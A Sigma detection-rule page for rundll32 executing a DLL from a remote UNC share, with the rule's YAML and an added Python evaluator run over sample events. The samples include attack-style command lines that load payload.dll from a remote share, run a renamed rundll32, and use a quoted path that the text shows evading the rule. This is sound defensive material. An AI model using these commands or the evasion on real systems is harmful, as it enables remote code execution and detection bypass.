Rundll32 UNC Path Execution
Detects rundll32 execution where the DLL argument is a UNC path, i.e. the DLL is loaded from a remote share rather than from local disk.
Sigma rule
title: Rundll32 UNC Path Execution
id: 5cdb711b-5740-4fb2-ba88-f7945027afac
status: test
description: Detects rundll32 execution where the DLL is located on a remote location (share)
references:
    - https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-10
tags:
    - attack.defense-evasion
    - attack.execution
    - attack.lateral-movement
    - attack.t1021.002
    - attack.t1218.011
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\rundll32.exe'
        - OriginalFileName: 'RUNDLL32.EXE'
        - CommandLine|contains: 'rundll32'
    selection_cli:
        CommandLine|contains: ' \\\\'
    condition: all of selection_*
falsepositives:
    - Unlikely
level: high
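The detection logic above, evaluated over constructed process_creation events. This is an added example, not code from SigmaHQ or the rule author; the function names and the sample events are assumptions made for illustration. Two Sigma conventions matter for reading the rule correctly: a list under a selection (selection_img) is OR-ed, so a renamed rundll32 binary is still caught via OriginalFileName, and in Sigma's escaping the YAML string ' \\\\' denotes a space followed by two literal backslashes, i.e. the start of a UNC path such as " \\server\share". String matching is case-insensitive by default, so the example lowercases both sides.

```python
# Added example: minimal Python evaluation of the "Rundll32 UNC Path Execution"
# Sigma rule over constructed Sysmon-style process_creation events.
# Helper names and sample events are assumptions for illustration only.

from typing import Dict, List

# ' \\\\' in the YAML = a space followed by two literal backslashes.
UNC_MARKER = " \\\\"


def selection_img(event: Dict[str, str]) -> bool:
    # The three entries under selection_img are a YAML list, hence OR-ed.
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    cmdline = event.get("CommandLine", "").lower()
    return (
        image.endswith("\\rundll32.exe")        # Image|endswith: '\rundll32.exe'
        or original == "rundll32.exe"           # OriginalFileName: 'RUNDLL32.EXE'
        or "rundll32" in cmdline                # CommandLine|contains: 'rundll32'
    )


def selection_cli(event: Dict[str, str]) -> bool:
    # CommandLine|contains ' \\\\'  ->  " \\" must occur in the command line.
    return UNC_MARKER in event.get("CommandLine", "").lower()


def matches(event: Dict[str, str]) -> bool:
    # condition: all of selection_*
    return selection_img(event) and selection_cli(event)


# Constructed sample events (Sysmon EID 1 field names); not real telemetry.
EVENTS: List[Dict[str, str]] = [
    # 1. rundll32 loading a DLL from a UNC share -> match
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe \\10.0.0.5\share\payload.dll,DllMain"},
    # 2. Renamed copy of rundll32: Image no longer ends with \rundll32.exe and
    #    the command line never says "rundll32", but OriginalFileName (from the
    #    PE version resource) still identifies it -> match
    {"Image": r"C:\Users\Public\svchost.exe",
     "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"svchost.exe \\10.0.0.5\share\payload.dll,DllMain"},
    # 3. Benign local DLL -> no match
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
    # 4. Launched through cmd.exe: only the CommandLine branch of
    #    selection_img fires, which is enough -> match
    {"Image": r"C:\Windows\System32\cmd.exe",
     "OriginalFileName": "Cmd.Exe",
     "CommandLine": r"cmd.exe /c rundll32 \\fileserver\tools\x.dll,Run"},
    # 5. UNC path wrapped in quotes: the character before the backslashes is a
    #    quote, not a space, so ' \\' never occurs and the rule does NOT fire.
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r'rundll32.exe "\\10.0.0.5\share\payload.dll",DllMain'},
]


def evaluate(events: List[Dict[str, str]]) -> List[bool]:
    """Return one verdict per event in input order."""
    return [matches(e) for e in events]


if __name__ == "__main__":
    for e, hit in zip(EVENTS, evaluate(EVENTS)):
        print(f"{'ALERT' if hit else 'ok   '} {e['CommandLine']}")
```

Event 5 is worth keeping in mind when tuning: because selection_cli anchors on a space immediately before the backslashes, a quoted UNC argument slips past this rule as written, so it should be paired with a broader rundll32 UNC rule or a share-access detection rather than relied on alone.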
References
- https://www.cybereason.com/blog/rundll32-the-infamous-proxy-for-executing-malicious-code
Related rules
- Potentially Suspicious Rundll32.EXE Execution of UDL File
- Kapeka Backdoor Loaded Via Rundll32.EXE
- Potential Raspberry Robin CPL Execution Activity
- Remote Thread Creation Via PowerShell In Uncommon Target
- APT29 2018 Phishing Campaign CommandLine Indicators